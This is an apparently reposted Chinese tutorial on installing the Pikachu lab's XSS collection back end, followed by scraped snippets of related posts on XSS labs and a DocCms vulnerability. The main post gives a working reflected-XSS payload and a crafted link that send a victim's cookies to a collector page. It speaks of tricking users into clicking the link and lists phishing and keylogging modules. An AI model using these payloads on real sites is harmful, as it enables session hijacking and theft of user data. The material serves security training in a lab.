pikachu XSS后台的使用和安装

xss后台的安装

重定向到另一个可信网址  让点击者 不知情

 1.cookie值获取

查看源代码

在反射型xss(get)页面下使用

<script> document.location = ‘http://192.168.50.100/pkxss/xcookie/cookie.php?cookie=‘   +  document.cookie; </script>

 

点提交,会跳转到首页,

http://192.168.50.100/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3E+document.location+%3D+%27http%3A%2F%2F192.168.50.100%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+++%2B++document.cookie%3B+%3C%2Fscript%3E&submit=submit

欺骗用户去点击

就会出现第二个

反射型xss(get

让用户去点击这个页面  获取cookie值

 

2.钓鱼结果

3.键盘记录

原文地址:https://www.cnblogs.com/xingyuner/p/12299840.html

时间: 2024-08-03 20:34:20

pikachu XSS后台的使用和安装的相关文章

pikachu xss&#39;

反射性xss(get) 输入“ '"<>123456 ” 用于测试我们的输入会不会被过滤掉,因为有特殊字符 查看页面源码 输入被输出到了 p 标签中 测试输入的JS代码payload如下 前端对输入长度做了限制,修改一下成为2333333    才能输入完整的payload 成功执行 查看源码,输入的payload嵌入了到了 p 标签里面 反射性xss(post) 用户名密码 admin 123456  进入界面 不能输入标签中 POST的方式提交的,参数内容不会出现在URL中,通过

DocCms存储型XSS+后台任意文件下载上传+目录删除+sql执行(有条件可getshell)

下载链接 https://share.weiyun.com/46ebceb4fe91da144ad2661522a941e1 留言处存储型XSS 漏洞在content/guestbook/index.php function create() { echo 123; global $db,$request; if ($_SESSION['verifycode'] != $request['checkcode']) { echo '<script>alert("请正确填写验证码!&qu

saltstack 配置mongodb作为后台存储pillar,自动化安装mongodb,创建mongodb用户

## saltstack 学习记录 配置文件 $ cat /etc/salt/master.d/10-master.conf user: root interface: 127.0.0.1 ipv6: False worker_threads: 10 hash_type: sha256 log_level_logfile: debug log_level: info default_top: base cli_summary: false state_output: changes $ cat 

pikachu练习平台(XSS-漏洞测试案例(cookie的窃取和利用、钓鱼攻击、XSS获取键盘记录))

XSS-漏洞测试案例 xss案例 1.cookie的窃取和利用 2.钓鱼攻击 3.XSS获取键盘记录 在进行案例之前首先要搭建xss后台 搭建xss后台 1.在pikachu文件夹下面,把pkxss单独放在www下面: 2.修改配置文件  数据库服务器地址,账号,密码: 3.登录: 4.安装: 5.修改,重定向到一个可信的网站(令点击者不知情): 后台登陆成功: 一. get型xss cookie值获取 首先修改字符输入长度: 输入框输入 <script>document.location='

Pikachu漏洞练习平台实验——XSS(二)

概述 反射型XSS(get) XSS案例:盗取Cookie 反射型XSS(post) 存储型XSS XSS案例:钓鱼攻击 XSS案例:键盘记录 DOM型XSS DOM型XSS-X XSS之盲打 XSS之过滤 XSS之htmlspecialchars XSS常见防范措施 XSS之href输出 XSS之js输出 概述 简介 XSS是一种发生在Web前端的漏洞,所以其危害的对象也主要是前端用户 XSS漏洞可以用来进行钓鱼攻击.前端js挖矿.盗取用户cookie,甚至对主机进行远程控制 攻击流程 假设存

XSS盲打测试(pikachu)

XSS盲打 1.在提交框随意输入一段内容,可以发现并没有在前端进行输出,我们根据提示(pikachu平台每关所给的提示真的超级重要的)登陆一下pikachu的后台. 2.输入一段js代码看一下后台的情况.我们输入的js代码已经被后台成功执行了.盲打和存储型有些相似危害还是很大的,如果后台执行过滤不严的话还是很容易被一些不怀好意的人钻空子的,之所以说是盲打是因为我们并不知道后端是什么样子的,只能尝试,万一成功了呢? 原文地址:https://www.cnblogs.com/fairyting/p/

pikachu实验环境搭建

环境搭建 由于我们之前做过sqli-labs和DVWA的练习,本地搭建的环境phpstudy已经完善(如果没有安装phpstudy,可以安装phpstudy或者xampp)所以我们只要将pikachu的包放入WWW文件夹下即可 在inc文件夹下查看config.inc.php文件(路径如下图),可以看到地址,用户名,密码,端口号,还要在pkxss文件夹,选择inc(路径如下图),然后用打开config.inc.php.用户名和密码要改成root(用户名和密码根据自己的实际情况修改为自己的数据库用

跨站点脚本攻击(XSS)

XSS分类: (1)反射型XSS:只是简单地把用户输入的数据反射给浏览器.往往需要诱使用户"点击"一个恶意链接.也叫"非持久型XSS" (2)存储型XSS:把用户输入的数据"存储"在服务器端.也叫"持久型XSS" (3)DOM Based XSS:从效果上来说也是反射型XSS,通过修改页面的DOM结点形成的XSS. 1.cookie劫持:httponly或者将cookie和客户端IP绑定可防止 2.XSSPayload: (1

Web安全之跨站脚本攻击(XSS)

XSS 简介 跨站脚本攻击,英文全称是 Cross Site Script,本来缩写是CSS,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做"XSS". XSS 攻击,通常指黑客利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,从而通过"HTML注入"篡改了网页,插入了恶意的脚本,然后在用户浏览网页时,控制用户浏览器(盗取用户资料.利用用户身份进行某种动作或者对访问者进行病毒侵害)的一种攻击方式. XS